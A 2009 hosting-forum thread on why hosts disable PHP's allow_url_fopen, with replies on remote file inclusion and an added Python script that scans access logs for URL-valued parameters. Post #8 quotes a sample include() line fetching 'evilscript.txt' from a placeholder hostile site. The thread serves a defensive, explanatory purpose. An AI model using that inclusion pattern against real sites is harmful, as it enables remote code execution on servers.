Why hosts refused to enable the allow_url_fopen PHP setting?

Discussion in 'Web Hosting' started by jamuna, Jan 22, 2009.

  1. #1
    I need to install the RSS To Post plugin in a MyBB forum at satnetforum.com.
    It needs the following function on the server.

    'Your allow_url_fopen PHP setting is currently disabled. RSS To Post will NOT function.'

    Is it possible to enable the function at server level?

    Is there any host here to support such a requirement?

    My present host suntex hosting refused to do so.

    I am considering moving my forum to a suitable host.
     
    jamuna, Jan 22, 2009 IP
  2. ~Monty~

    ~Monty~ Active Member

    #2
    99% of hosts allow it. 1% don't allow it.
    2 reasons: 1) Rapidleech 2) They are free hosts
     
    ~Monty~, Jan 22, 2009 IP
  3. njoker555

    njoker555 Notable Member

    #3
    most hosts allow it, not sure if I'd say 99% of all hosts :) and they refused to enable it for you? time to move out then lol
     
    njoker555, Jan 22, 2009 IP
  4. jamuna

    jamuna Active Member

    #4
    My present host suntex hosting refused to do so.
    Is there any security-related problem?
    That's why I ask here.
     
    jamuna, Jan 22, 2009 IP
  5. weanz

    weanz Active Member

    #5
    It does have security problems; it may overload the server if everyone uses a spider to grab the content. It needs to be agreed with your host when using that. I think it won't be a problem in most cases.
     
    weanz, Jan 22, 2009 IP
  6. njoker555

    njoker555 Notable Member

    #6
    it's not a security risk because the feature is used to grab content from outside sources - usually used in scripts that update, for example, a shoutcast monitoring script where it tells you what song is currently playing and how many listeners there are

    and as long as it isn't trying to grab a 1000 things from a 1000 different websites, it won't overload anything. Some people try to open search engines with this and if a host has a good monitoring system, they will be able to stop the server from even coming close to overloading.

    I guess your current host doesn't want to take the risk or they don't want to be bothered with it, OR they don't even have control over it, I am not familiar with the company so I can't say for sure.
     
    njoker555, Jan 22, 2009 IP
  7. sajidshabbir

    sajidshabbir Well-Known Member

    #7
    We are currently allowing this for our customers,

    and there are many other hosts which allow this.
     
    sajidshabbir, Jan 22, 2009 IP
  8. qualityhostings

    qualityhostings Well-Known Member

    #8
    If enabled, allow_url_fopen allows PHP's file functions -- such as file_get_contents() and the include and require statements -- to retrieve data from remote locations, like an FTP or web site. Programmers frequently forget this and don't do proper input filtering when passing user-provided data to these functions, opening them up to code injection vulnerabilities. A large number of code injection vulnerabilities reported in PHP-based web applications are caused by the combination of enabling allow_url_fopen and bad input filtering.

    Hosts that really care about the security of the server usually disable it.

    allow_url_fopen is on by default. A typical server owner will not really know about this. They aren't aware of these things, so they don't bother to disable it.

    We use an altered PHP configuration to get maximum security. And we know what we are doing.

    Hosts like DreamHost are not allowing it.


    If allow_url_fopen is enabled, this system can be exploited by simply changing the value of the variable in the querystring:

    include("http://yourdomain.com/index.php?page=http://hacksite .net/evilscript.txt");


    These kinds of attack logs can be found simply by checking the ModSecurity log file. I have seen these attacks against Joomla sites.



    So to avoid potential compromise of our clients' websites, the PHP variable allow_url_fopen=off is on all our servers now.


    Check this too



    So basically I will say, those who say this is not a security risk don't actually know what they are saying.


    Vivek
     
    qualityhostings, Jan 22, 2009 IP
    jamuna likes this.
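The post above says these requests show up in server logs. As an added example (not code from the thread or from any host mentioned in it), this script flags requests in which a query parameter carries a URL, the pattern the post describes, including double-encoded values. It assumes Apache common/combined access-log lines; the sample lines, addresses and host names are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Schemes that PHP stream wrappers resolve when a value reaches include()/fopen().
WRAPPER = re.compile(r"^\s*(?:https?|ftps?|php|data)\s*:", re.I)
# Assumed input: Apache common/combined log -> client, request line, status.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)[^"]*" (\d{3})')


def url_valued_params(target):
    """Return (name, decoded_value) for query parameters whose value is a URL."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl decodes once; decode a second time to catch double encoding.
        for candidate in (value, unquote(value)):
            if WRAPPER.match(candidate):
                hits.append((name, candidate))
                break
    return hits


def scan(lines):
    """Return (client, status, name, value) for every URL-valued parameter."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, _method, target, status = m.groups()
        for name, value in url_valued_params(target):
            # A 2xx status means the script ran with that value: review first.
            findings.append((client, int(status), name, value))
    return findings


# Constructed sample lines (documentation IP ranges, example.net host).
SAMPLE = [
    '192.0.2.10 - - [22/Jan/2009:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '198.51.100.7 - - [22/Jan/2009:10:00:05 +0000] "GET /index.php?page=http://files.example.net/x.txt HTTP/1.1" 200 311',
    '198.51.100.7 - - [22/Jan/2009:10:00:09 +0000] "GET /index.php?page=http%253A%252F%252Ffiles.example.net%252Fx.txt HTTP/1.1" 404 210',
    '203.0.113.4 - - [22/Jan/2009:10:01:00 +0000] "GET /search.php?q=http+headers HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Legitimate redirect or feed-URL parameters match as well, so hits are leads to review against the script that handled them. Since PHP 5.2.0, remote `include`/`require` is governed by the separate `allow_url_include` setting (off by default), while `allow_url_fopen` still controls `fopen()` and `file_get_contents()`.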
  9. jamuna

    jamuna Active Member

    #9
    thanks for this information
     
    jamuna, Jan 23, 2009 IP
  10. KlearConcepts

    KlearConcepts Peon

    #10
    In some cases, web hosts see it as a security risk so they wouldn't allow it to the public. But a simple ticket would enable them to open it for you on a per-account basis.
     
    KlearConcepts, Jan 23, 2009 IP
  11. qualityhostings

    qualityhostings Well-Known Member

    #11
    Per-account basis?
    Can you tell me how I can enable it for a single account?
    I really don't think so. :p
     
    qualityhostings, Jan 23, 2009 IP
  12. SOULZRIPPER

    SOULZRIPPER Well-Known Member

    #12
    SOULZRIPPER, Jan 23, 2009 IP
  13. qualityhostings

    qualityhostings Well-Known Member

    #13
    qualityhostings, Jan 23, 2009 IP
  14. qualityhostings

    qualityhostings Well-Known Member

    #14

    Anyways, we do not want to disappoint any of our clients.
    I just enabled it and will be keeping an eye on it for some days.
     
    qualityhostings, Jan 24, 2009 IP
  15. jamuna

    jamuna Active Member

    #15
    Great help, thanks.
    I have multiple hosting accounts.
    All the others have the above setting enabled.
    That's why I ask here.
     
    jamuna, Jan 26, 2009 IP
  16. KlearConcepts

    KlearConcepts Peon

    #16
    You can tell your customer to make their own php.ini file in their FTP and they can turn on the function from their end.
     
    KlearConcepts, Jan 26, 2009 IP